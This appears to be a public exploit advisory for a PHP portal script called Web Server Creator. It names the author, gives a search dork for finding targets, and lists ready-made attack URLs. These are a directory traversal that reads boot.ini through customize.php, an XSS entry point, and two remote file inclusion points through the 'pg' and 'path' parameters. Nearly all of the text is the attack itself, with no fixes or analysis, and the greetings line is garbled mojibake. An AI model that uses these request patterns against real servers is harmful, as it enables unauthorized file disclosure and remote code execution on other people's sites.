29 lines
1.7 KiB
Text
Executable file
29 lines
1.7 KiB
Text
Executable file
========================================================================================
|
|
| # Title : Web Server Creator - Web Portal v 0.1 Multi Vulnerability
|
|
| # Author : indoushka
|
|
| # email : indoushka@hotmail.com
|
|
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
|
|
| # Web Site : http://www.comscripts.com/scripts/php.web-server-creator.1082.html
|
|
| # Dork : All right reserved 2002-2003 (MSN/Web Server Creator)
|
|
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
|
|
| # Bug : Multi
|
|
====================== Exploit By indoushka =================================
|
|
# Exploit :
|
|
|
|
1- Directory traversal (Windows)
|
|
|
|
http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
|
|
|
|
2- XSS
|
|
|
|
http://127.0.0.1/1082_webserve-01/index.php?pg=forum
|
|
|
|
3- RFI
|
|
|
|
http://localhost/1082_webserve-01/index.php?pg=[EV!L]
|
|
|
|
http://localhost/1082_webserve-01/news/form.php?path=[EV!L]
|
|
|
|
================================ Dz-Ghost Team ========================================
|
|
Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ
|
|
-------------------------------------------------------------------------------------------
|